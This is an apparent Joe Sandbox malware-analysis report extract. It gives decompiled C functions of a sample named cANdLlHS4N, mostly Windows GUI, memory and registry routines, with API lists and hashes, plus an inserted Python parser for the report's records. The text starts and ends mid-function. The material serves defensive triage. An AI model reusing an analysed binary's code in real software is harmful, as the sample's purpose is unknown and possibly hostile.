      				_t93 = __ecx;
      				_push(0x40);
      				E00AAD29B(0xac8639, __ebx, __edi, __esi);
      				 *((intOrPtr*)(_t113 - 0x4c)) =  *((intOrPtr*)(_t113 + 0xc));
      				_t60 =  *((intOrPtr*)(_t113 + 0x10));
      				 *((intOrPtr*)(_t113 - 0x48)) = __ecx;
      				_t115 = _t60;
      				if(_t60 != 0) {
      					 *_t60 = 0;
      				}
      				 *(_t113 - 0x2c) = GetDC(0);
      				_t110 = E009BAD30(0, _t93, _t106, _t109, _t111, _t115, _t61);
      				E009BA639(_t113 - 0x44);
      				 *(_t113 - 4) = 0;
      				 *((intOrPtr*)(_t113 - 0x34)) = _t110;
      				 *((intOrPtr*)(_t113 - 0x30)) = 0;
      				 *((intOrPtr*)(_t113 - 0x24)) = 0;
      				 *((intOrPtr*)(_t113 - 0x28)) = 0xad7e64;
      				_t64 =  *((intOrPtr*)(_t113 + 8));
      				 *(_t113 - 4) = 1;
      				 *((intOrPtr*)(_t113 - 0x20)) = 0;
      				 *((intOrPtr*)(_t113 - 0x1c)) = 0;
      				 *((intOrPtr*)(_t113 - 0x18)) = _t64;
      				 *((intOrPtr*)(_t113 - 0x14)) = _t64;
      				if(_t110 != 0) {
      					_t65 =  *(_t110 + 4);
      				} else {
      					_t65 = 0;
      				}
      				if(E009BAD44(0, _t113 - 0x44, _t106, _t110, CreateCompatibleDC(_t65)) == 0) {
      					ReleaseDC(0,  *(_t113 - 0x2c));
      					 *(_t113 - 4) = 0;
      					 *((intOrPtr*)(_t113 - 0x28)) = 0xad7e64;
      					E009A93B2(0, _t113 - 0x28, _t110, 0xad7e64, __eflags);
      					 *(_t113 - 4) =  *(_t113 - 4) | 0xffffffff;
      					E009BADC5(_t113 - 0x44);
      					__eflags = 0;
      				} else {
      					if(E009BB018(0, _t113 - 0x28, _t106, _t110, CreateCompatibleBitmap( *(_t110 + 4),  *((intOrPtr*)(_t113 - 0x18)) -  *((intOrPtr*)(_t113 - 0x20)),  *((intOrPtr*)(_t113 - 0x14)) -  *((intOrPtr*)(_t113 - 0x1c)))) != 0) {
      						 *((intOrPtr*)(_t113 - 0x34)) = _t113 - 0x44;
      						 *((intOrPtr*)(_t113 - 0x30)) = E009BB0A9( *((intOrPtr*)(_t113 - 0x40)),  *((intOrPtr*)(_t113 - 0x24)));
      					}
      					E009BB0A9( *((intOrPtr*)(_t113 - 0x40)),  *((intOrPtr*)(_t113 - 0x24)));
      					_t108 = _t113 - 0x44;
      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t113 - 0x48)))) + 0x10c))(_t113 - 0x44, _t113 - 0x20);
      					if( *((intOrPtr*)(_t113 - 0x34)) != _t110) {
      						_t86 =  *((intOrPtr*)(_t113 - 0x30));
      						_t120 = _t86;
      						if(_t86 != 0) {
      							_t87 =  *((intOrPtr*)(_t86 + 4));
      						} else {
      							_t87 = 0;
      						}
      						E009BB0A9( *((intOrPtr*)(_t113 - 0x40)), _t87);
      					}
      					ReleaseDC(0,  *(_t113 - 0x2c));
      					 *((intOrPtr*)( *((intOrPtr*)(_t113 - 0x4c)))) = E009BB046(0, _t113 - 0x28, _t108);
      					 *(_t113 - 4) = 0;
      					 *((intOrPtr*)(_t113 - 0x28)) = 0xad7e64;
      					E009A93B2(0, _t113 - 0x28, _t110, 0xad7e64, _t120);
      					 *(_t113 - 4) =  *(_t113 - 4) | 0xffffffff;
      					E009BADC5(_t113 - 0x44);
      				}
      				return E00AAD31E(0, _t110, 0xad7e64);
      			}

      Address column for the preceding C-code listing (flattened by extraction, one address per decompiled line): 0x009b78cf to 0x009b7a26

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009B78D6
      • GetDC.USER32(00000000), ref: 009B78F0
      • CreateCompatibleDC.GDI32(?), ref: 009B793C
      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 009B7964
      • ReleaseDC.USER32 ref: 009B79C9
      • ReleaseDC.USER32 ref: 009B79FF
        • Part of subcall function 009A93B2: __EH_prolog3_catch_GS.LIBCMT ref: 009A93BC
        • Part of subcall function 009BADC5: DeleteDC.GDI32(00000000), ref: 009BADD7
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CompatibleCreateRelease$BitmapDeleteH_prolog3_H_prolog3_catch_
      • String ID:
      • API String ID: 1095363469-0
      • Opcode ID: 6db2176d28a6a5dc5ecefab9f5047dfb1627a9a4de017df2b6a5369afd275ae5
      • Instruction ID: 75ec637c38332d215d57524a75d31e7fbca01c0674e380d4aa60af9003a5d473
      • Opcode Fuzzy Hash: 6db2176d28a6a5dc5ecefab9f5047dfb1627a9a4de017df2b6a5369afd275ae5
      • Instruction Fuzzy Hash: 9B41C3B1D01209DFCF01EFE4CA859EDFBB5BF88320F144669E412A7291DB359A45CB60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E00A39D16(intOrPtr __ecx, void* __edx, void* __edi, intOrPtr _a4, long _a8) {
      				signed int _v8;
      				intOrPtr _v12;
      				void* __ebx;
      				void* __ebp;
      				signed int* _t15;
      				void* _t16;
      				intOrPtr _t17;
      				signed int _t19;
      				void* _t22;
      				intOrPtr _t23;
      				intOrPtr _t30;
      				void* _t33;
      				void* _t34;
      				void* _t36;
      				void* _t38;
      
      				_t34 = __edi;
      				_t33 = __edx;
      				_push(__ecx);
      				_push(__ecx);
      				_v12 = __ecx;
      				_t36 = GlobalAlloc(2, _a8);
      				if(_t36 != 0) {
      					_v8 = _v8 & 0x00000000;
      					E00AAB080(GlobalLock(_t36), _a4, _a8);
      					_t15 =  &_v8;
      					__imp__CreateStreamOnHGlobal(_t36, 0, _t15);
      					__eflags = _t15;
      					if(_t15 != 0) {
      						goto L1;
      					}
      					__eflags =  *0xd11e98 - _t15;
      					if( *0xd11e98 != _t15) {
      						EnterCriticalSection(0xd11eb4);
      					}
      					_t17 =  *0xd11e60; // 0x0
      					__eflags = _t17;
      					if(__eflags == 0) {
      						_t23 = E009A6291(__eflags, 0x34);
      						_pop(_t32);
      						__eflags = _t23;
      						if(_t23 == 0) {
      							_t17 = 0;
      							__eflags = 0;
      						} else {
      							_t32 = _t23;
      							_t17 = E009D52E2(_t23);
      						}
      						 *0xd11e60 = _t17;
      						__eflags = _t17;
      						if(_t17 == 0) {
      							_t17 = E009B8782(_t32);
      						}
      					}
      					E00A39CAD(_t17, _t33, _v8);
      					_t19 = _v8;
      					 *((intOrPtr*)( *_t19 + 8))(_t19);
      					_t30 =  *0xd11e60; // 0x0
      					_t22 = E009BB018(0xd11eb4, _v12, _t33, _t34, E009D5322(_t30));
      					__eflags =  *0xd11e98;
      					_t38 = _t22;
      					if( *0xd11e98 != 0) {
      						LeaveCriticalSection(0xd11eb4);
      					}
      					_t16 = _t38;
      					L14:
      					return _t16;
      				}
      				L1:
      				_t16 = 0;
      				goto L14;
      			}

      Address column for the preceding C-code listing (flattened by extraction, one address per decompiled line): 0x00a39d16 to 0x00a39de5

      APIs
      • GlobalAlloc.KERNEL32(00000002,?,?,?,?,?,00A39E5F,00000000,00000000,?,?,00A3BCA6,?,?,?,00000084), ref: 00A39D26
      • GlobalLock.KERNEL32 ref: 00A39D3E
      • _memmove.LIBCMT ref: 00A39D4B
      • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?), ref: 00A39D5A
      • EnterCriticalSection.KERNEL32(00D11EB4,00000000), ref: 00A39D73
      • LeaveCriticalSection.KERNEL32(00D11EB4,00000000), ref: 00A39DDA
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$CriticalSection$AllocCreateEnterLeaveLockStream_memmove
      • String ID:
      • API String ID: 861836607-0
      • Opcode ID: 59caa90c9c89e36087715a7875775e5e6a0936b56f110f1804128cfd0c407024
      • Instruction ID: eead96d4862d91065ac96c2eb73557898ee4c05a35849450dc4b37e81754dd9d
      • Opcode Fuzzy Hash: 59caa90c9c89e36087715a7875775e5e6a0936b56f110f1804128cfd0c407024
      • Instruction Fuzzy Hash: 51215E79A00315BBDB10ABF4DC4ABAF7BA8EB44391F148425F906D6251EFB1DD01C760
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009B42D4(struct HWND__* _a4, struct HWND__** _a8) {
      				struct HWND__* _t8;
      				void* _t14;
      				struct HWND__** _t16;
      				struct HWND__* _t17;
      				struct HWND__* _t18;
      
      				_t18 = _a4;
      				if(_t18 != 0) {
      					L5:
      					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
      						L8:
      						_t17 = _t18;
      						_t8 = _t18;
      						if(_t18 == 0) {
      							L10:
      							if(_a4 == 0 && _t18 != 0) {
      								_t18 = GetLastActivePopup(_t18);
      							}
      							_t16 = _a8;
      							if(_t16 != 0) {
      								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
      									 *_t16 =  *_t16 & 0x00000000;
      								} else {
      									 *_t16 = _t17;
      									EnableWindow(_t17, 0);
      								}
      							}
      							return _t18;
      						} else {
      							goto L9;
      						}
      						do {
      							L9:
      							_t17 = _t8;
      							_t8 = GetParent(_t8);
      						} while (_t8 != 0);
      						goto L10;
      					}
      					_t18 = GetParent(_t18);
      					L7:
      					if(_t18 != 0) {
      						goto L5;
      					}
      					goto L8;
      				}
      				_t14 = E009B428D();
      				if(_t14 != 0) {
      					L4:
      					_t18 =  *(_t14 + 0x20);
      					goto L7;
      				}
      				_t14 = E009A6B56();
      				if(_t14 != 0) {
      					goto L4;
      				}
      				_t18 = 0;
      				goto L8;
      			}

      Address column for the preceding C-code listing (flattened by extraction, one address per decompiled line): 0x009b42e1 to 0x009b4371

      APIs
      • GetWindowLongA.USER32 ref: 009B4307
      • GetParent.USER32(009A4695), ref: 009B4315
      • GetParent.USER32(009A4695), ref: 009B4328
      • GetLastActivePopup.USER32(009A4695), ref: 009B4339
      • IsWindowEnabled.USER32(009A4695), ref: 009B434D
      • EnableWindow.USER32(009A4695,00000000), ref: 009B4360
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
      • String ID:
      • API String ID: 670545878-0
      • Opcode ID: 087227b800ba7867b917f0d4aed82d1a59341456a65d97ca4450d28219413a3e
      • Instruction ID: d67a65e0f660de4b47d802a3637b75d6b40370083abdab213a599586f99430d3
      • Opcode Fuzzy Hash: 087227b800ba7867b917f0d4aed82d1a59341456a65d97ca4450d28219413a3e
      • Instruction Fuzzy Hash: 8E11BF326066329BCF214A998B44BEA72ECAF95B75F0E0111EC11EB206D734DC01A6E1
      Uniqueness

      Uniqueness Score: -1.00%
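
      Every function in this section is reported with the same fixed fields: the decompiled signature under "C-Code - Quality", the address column, the "APIs" list (direct calls with their "ref:" address, plus calls reached "Part of subcall function ..."), and the Similarity hashes. Because that layout repeats for each function, the API surface of the whole sample can be queried mechanically instead of read block by block. The Python parser below is an added example, not part of the Joe Sandbox report or its tooling; it assumes only the record layout visible on this page, and the sample input embedded in it is a constructed condensation of the E009B42D4 and E009B78CF records above.

```python
"""Parser for the per-function records of a Joe Sandbox report (the 'C-Code - Quality'
blocks above). Added example, not the report's own tooling; it assumes only the record
layout visible on this page."""
import re

# A record starts at "C-Code - Quality: NN%" and runs to the next such line.
RECORD_START = re.compile(r"^[ \t]*C-Code - Quality: (\d+)%[ \t]*$", re.M)
# First line of a record: the decompiled signature "E009B42D4(...) {".
FUNC_SIG = re.compile(r"^[ \t]*(E[0-9A-F]{8})\([^)]*\)[ \t]*\{", re.M)
# The flattened address column: one "0x........" line per decompiled line.
ADDR_LINE = re.compile(r"^[ \t]*0x([0-9a-f]{8})[ \t]*$", re.M)
# Direct call: "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR".
API_LINE = re.compile(r"^[ \t]*•[ \t]*(?!Part of subcall)([^\s.(]+)\.([A-Za-z0-9_]+)"
                      r"(?:\(([^)]*)\))?,?[ \t]*ref:[ \t]*([0-9A-F]{8})", re.M)
# Call reached through a callee: "• Part of subcall function ADDR: Name.MODULE ...".
SUBCALL_LINE = re.compile(r"^[ \t]*•[ \t]*Part of subcall function ([0-9A-F]{8}):[ \t]*"
                          r"([^\s.(]+)\.([A-Za-z0-9_]+)", re.M)

def _field(body, name):
    """Value of a '• <name>: value' line (Similarity section), or '' when absent."""
    m = re.search(r"^[ \t]*•[ \t]*" + re.escape(name) + r":[ \t]*(.*?)[ \t]*$", body, re.M)
    return m.group(1) if m else ""

def parse_records(text):
    """Split the report text into records and extract the fields worth querying."""
    parts = RECORD_START.split(text)  # [preamble, quality, body, quality, body, ...]
    records = []
    for quality, body in zip(parts[1::2], parts[2::2]):
        sig = FUNC_SIG.search(body)
        if not sig:
            continue  # record without a decompiled signature: nothing to key it on
        records.append({
            "function": sig.group(1),
            "quality": int(quality),
            # 0x00000000 entries belong to lines without an address (labels, braces).
            "addresses": [a for a in ADDR_LINE.findall(body) if a != "00000000"],
            "apis": [{"name": n, "module": mod, "args": args, "ref": ref}
                     for n, mod, args, ref in API_LINE.findall(body)],
            "subcalls": [{"via": via, "name": n, "module": mod}
                         for via, n, mod in SUBCALL_LINE.findall(body)],
            "opcode_id": _field(body, "Opcode ID"),
            "fuzzy_hash": _field(body, "Instruction Fuzzy Hash"),
        })
    return records

def functions_calling(records, api_name, include_subcalls=False):
    """Decompiled functions that reach api_name directly (or, optionally, via a callee)."""
    hits = []
    for r in records:
        names = {a["name"] for a in r["apis"]}
        if include_subcalls:
            names |= {s["name"] for s in r["subcalls"]}
        if api_name in names:
            hits.append(r["function"])
    return sorted(hits)

def api_histogram(records):
    """Direct call sites per MODULE!Api across all records: the sample's API surface."""
    counts = {}
    for r in records:
        for a in r["apis"]:
            key = f"{a['module']}!{a['name']}"
            counts[key] = counts.get(key, 0) + 1
    return counts

# Constructed sample input: two records condensed from the report text above.
SAMPLE = """\
C-Code - Quality: 100%
\t\t\tE009B42D4(struct HWND__* _a4, struct HWND__** _a8) {
\t\t\t}
0x009b42e1
0x009b42e7
0x00000000
APIs
• GetWindowLongA.USER32 ref: 009B4307
• GetParent.USER32(009A4695), ref: 009B4315
• EnableWindow.USER32(009A4695,00000000), ref: 009B4360
• Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Opcode ID: 087227b800ba7867b917f0d4aed82d1a59341456a65d97ca4450d28219413a3e
• Instruction Fuzzy Hash: 8E11BF326066329BCF214A998B44BEA72ECAF95B75F0E0111EC11EB206D734DC01A6E1
Uniqueness Score: -1.00%
C-Code - Quality: 97%
\t\t\tE009B78CF(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
\t\t\t}
0x009b78cf
APIs
• __EH_prolog3_GS.LIBCMT ref: 009B78D6
• GetDC.USER32(00000000), ref: 009B78F0
• CreateCompatibleDC.GDI32(?), ref: 009B793C
• ReleaseDC.USER32 ref: 009B79C9
• ReleaseDC.USER32 ref: 009B79FF
  • Part of subcall function 009BADC5: DeleteDC.GDI32(00000000), ref: 009BADD7
• Opcode ID: 6db2176d28a6a5dc5ecefab9f5047dfb1627a9a4de017df2b6a5369afd275ae5
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["function"], r["quality"], sorted(a["name"] for a in r["apis"]))
```

      `functions_calling` answers the triage question such a listing raises (which decompiled functions reach a given API; with `include_subcalls=True` it also reports APIs reached only through a callee, as DeleteDC is for E009B78CF), and `api_histogram` gives the sample's direct imports per module. Pasting the full text of this section into `SAMPLE`, or reading it from a saved copy of the report, makes the same queries work across every function.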

      C-Code - Quality: 67%
      			E009A95B6(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t33;
      				long _t37;
      				void* _t40;
      				void* _t55;
      				intOrPtr _t64;
      				void* _t65;
      
      				_t58 = __edx;
      				_t48 = __ebx;
      				_push(0x18);
      				E00AAD265(0xac7e54, __ebx, __edi, __esi);
      				 *((intOrPtr*)(_t65 - 0x1c)) = __ecx;
      				_push(_t65 - 0x18);
      				_push(_t65 - 0x20);
      				_push( *((intOrPtr*)(_t65 + 0xc)));
      				_push(0x3e8);
      				L00AC57E6();
      				_t33 = GlobalLock( *(_t65 - 0x18));
      				E009A5D70(_t65 - 0x14, _t58, E009B9D52());
      				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
      				 *(_t65 - 4) = 1;
      				E009A6000(_t58, __edi, _t33);
      				_t37 = GlobalUnlock( *(_t65 - 0x18));
      				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
      				_push( *(_t65 - 0x18));
      				_push(0x8000);
      				_push(0x3e4);
      				_push(0x3e8);
      				_push( *((intOrPtr*)(_t65 + 0xc)));
      				L00AC57E0();
      				_t60 =  *((intOrPtr*)(_t65 - 0x1c));
      				PostMessageA( *(_t65 + 8), 0x3e4,  *( *((intOrPtr*)(_t65 - 0x1c)) + 0x20), _t37);
      				if(E009B0BF8( *((intOrPtr*)(_t65 - 0x1c))) != 0) {
      					_t64 =  *((intOrPtr*)(_t65 - 0x14));
      					__eflags =  *((intOrPtr*)(_t64 - 4)) - 1;
      					if(__eflags > 0) {
      						L009A55A0(_t65 - 0x14,  *((intOrPtr*)(_t64 - 0xc)));
      						_t64 =  *((intOrPtr*)(_t65 - 0x14));
      					}
      					_t40 = E009BD77F(_t48, _t60, _t64, __eflags);
      					_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4))));
      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)))) + 0xbc))(_t64);
      					E009A876D(_t48, _t65 - 0x14, _t60, 0xffffffff);
      					_t55 = _t64 - 0x10;
      				} else {
      					_t55 =  *((intOrPtr*)(_t65 - 0x14)) + 0xfffffff0;
      				}
      				E009A5510(_t55, _t58);
      				return E00AAD30A(0);
      			}

      Address column for the preceding C-code listing (flattened by extraction, one address per decompiled line): 0x009a95b6 to 0x009a96b2

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009A95BD
      • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 009A95D5
      • GlobalLock.KERNEL32 ref: 009A95DD
      • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 009A9607
      • ReuseDDElParam.USER32 ref: 009A9627
      • PostMessageA.USER32 ref: 009A9637
        • Part of subcall function 009B0BF8: IsWindowEnabled.USER32(?), ref: 009B0C01
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
      • String ID:
      • API String ID: 4187826474-0
      • Opcode ID: 525b01771d0787647266ccb3dbea4fd1e93552f6243c54a94d6b4d9a0d6ceac3
      • Instruction ID: 9af166b355d9fd6a79b58e160238736880345d26221525d875c84414aea3f696
      • Opcode Fuzzy Hash: 525b01771d0787647266ccb3dbea4fd1e93552f6243c54a94d6b4d9a0d6ceac3
      • Instruction Fuzzy Hash: 55213631900119ABCF01EBA0CE46BEEBB79BF45315F104629B512A71E1DB309E05DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 92%
      			E009A653C(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
      				intOrPtr _v8;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				struct HWND__* _t17;
      				signed int _t22;
      				void* _t28;
      				void* _t31;
      				struct HWND__* _t33;
      				void* _t35;
      
      				_t31 = __edx;
      				_t30 = __ecx;
      				_push(__ecx);
      				_v8 = __ecx;
      				_t17 = GetWindow(GetDesktopWindow(), 5);
      				_t33 = _t17;
      				_t37 = _t33;
      				if(_t33 == 0) {
      					L14:
      					return _t17;
      				} else {
      					_t28 = ShowWindow;
      					_push(_t35);
      					do {
      						_t35 = E009AC937(_t28, _t30, _t31, _t33, _t35, _t37, _t33);
      						if(_t35 != 0) {
      							_t20 =  *((intOrPtr*)(_v8 + 0x20));
      							if( *((intOrPtr*)(_v8 + 0x20)) != _t33 && E009A64A1(_t20, _t33) != 0) {
      								_t22 = GetWindowLongA(_t33, 0xfffffff0);
      								if(_a4 != 0) {
      									__eflags = _t22 & 0x18000000;
      									if(__eflags == 0) {
      										__eflags =  *(_t35 + 0x58) & 0x00000002;
      										if(__eflags != 0) {
      											__eflags =  *(_v8 + 0xd4);
      											if(__eflags == 0) {
      												ShowWindow(_t33, 4);
      												_t14 = _t35 + 0x58;
      												 *_t14 =  *(_t35 + 0x58) & 0xfffffffd;
      												__eflags =  *_t14;
      											}
      										}
      									}
      								} else {
      									if((_t22 & 0x18000000) == 0x10000000) {
      										ShowWindow(_t33, 0);
      										 *(_t35 + 0x58) =  *(_t35 + 0x58) | 0x00000002;
      									}
      								}
      							}
      						}
      						_t17 = GetWindow(_t33, 2);
      						_t33 = _t17;
      					} while (_t33 != 0);
      					goto L14;
      				}
      			}

      0x009a653c
      0x009a653c
      0x009a6541
      0x009a6545
      0x009a654f
      0x009a6555
      0x009a6557
      0x009a6559
      0x009a65e1
      0x009a65e3
      0x009a655f
      0x009a6560
      0x009a6566
      0x009a6567
      0x009a656d
      0x009a6571
      0x009a6576
      0x009a657b
      0x009a658b
      0x009a6595
      0x009a65ae
      0x009a65b3
      0x009a65b5
      0x009a65b9
      0x009a65be
      0x009a65c5
      0x009a65ca
      0x009a65cc
      0x009a65cc
      0x009a65cc
      0x009a65cc
      0x009a65c5
      0x009a65b9
      0x009a6597
      0x009a65a1
      0x009a65a6
      0x009a65a8
      0x009a65a8
      0x009a65a1
      0x009a6595
      0x009a657b
      0x009a65d3
      0x009a65d9
      0x009a65db
      0x00000000
      0x009a6567

      APIs
      • GetDesktopWindow.USER32 ref: 009A6548
      • GetWindow.USER32(00000000), ref: 009A654F
      • GetWindowLongA.USER32 ref: 009A658B
      • ShowWindow.USER32(00000000,00000000), ref: 009A65A6
      • ShowWindow.USER32(00000000,00000004), ref: 009A65CA
      • GetWindow.USER32(00000000,00000002), ref: 009A65D3
      Yara matches
      Similarity
      • API ID: Window$Show$DesktopLong
      • String ID:
      • API String ID: 3178490500-0
      • Opcode ID: 00d34c957a5844ea530a4a75582a0d0f6572903803e250c66720de87b785af19
      • Instruction ID: 750c2509dc3ceddec70aaa7b286cdbda051c93cc96dc45a6e87bde6e974c050b
      • Opcode Fuzzy Hash: 00d34c957a5844ea530a4a75582a0d0f6572903803e250c66720de87b785af19
      • Instruction Fuzzy Hash: 7011E731900359EBD721CB548C89F2F77EDDB82768F281109F521961D8EF74EC41D690
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 71%
      			E009B354A(void* __ecx, CHAR* _a4, char* _a8, char* _a12) {
      				long _t21;
      				void* _t29;
      
      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
      					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x6c));
      				}
      				_push(0);
      				if(_a8 != 0) {
      					_push(_a4);
      					_t29 = E009B33F8(__ecx);
      					if(_a12 != 0) {
      						if(_t29 == 0) {
      							L3:
      							return 0;
      						}
      						_t21 = RegSetValueExA(_t29, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
      						L10:
      						RegCloseKey(_t29);
      						return 0 | _t21 == 0x00000000;
      					}
      					if(_t29 == 0) {
      						goto L3;
      					}
      					_t21 = RegDeleteValueA(_t29, _a8);
      					goto L10;
      				}
      				_t29 = E009B333D(__ecx);
      				if(_t29 != 0) {
      					_t21 = RegDeleteKeyA(_t29, _a4);
      					goto L10;
      				}
      				goto L3;
      			}
      0x009b3557
      0x00000000
      0x009b35d6
      0x009b3559
      0x009b355d
      0x009b357a
      0x009b3582
      0x009b3587
      0x009b359b
      0x009b356a
      0x00000000
      0x009b356a
      0x009b35b2
      0x009b35b8
      0x009b35bb
      0x00000000
      0x009b35c5
      0x009b358b
      0x00000000
      0x00000000
      0x009b3591
      0x00000000
      0x009b3591
      0x009b3564
      0x009b3568
      0x009b3572
      0x00000000
      0x009b3572
      0x00000000

      APIs
      • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 009B3572
      • RegDeleteValueA.ADVAPI32(00000000,?), ref: 009B3591
      • RegCloseKey.ADVAPI32(00000000), ref: 009B35BB
        • Part of subcall function 009B333D: RegCloseKey.KERNELBASE(?), ref: 009B33E2
        • Part of subcall function 009B333D: RegCloseKey.ADVAPI32(?), ref: 009B33EC
      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 009B35D6
      Yara matches
      Similarity
      • API ID: Close$Delete$PrivateProfileStringValueWrite
      • String ID:
      • API String ID: 1330817964-0
      • Opcode ID: d15a37a73f708c1077e8d77669bd722e015067b17622b1593d8233894e880234
      • Instruction ID: c5e30679e640a5168d5cf15412cd556a94132450e7cabb0f24690d63121a3038
      • Opcode Fuzzy Hash: d15a37a73f708c1077e8d77669bd722e015067b17622b1593d8233894e880234
      • Instruction Fuzzy Hash: 4B112E72401155FFCF31EFA4DD888EE3B69FB48361715C829FA1A95020D7768B52AB50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009BBC7B(struct HWND__* _a4) {
      				struct HWND__* _t3;
      				struct HWND__* _t6;
      				struct HWND__* _t8;
      				struct HWND__* _t10;
      
      				_t3 = GetFocus();
      				_t10 = _t3;
      				if(_t10 != 0) {
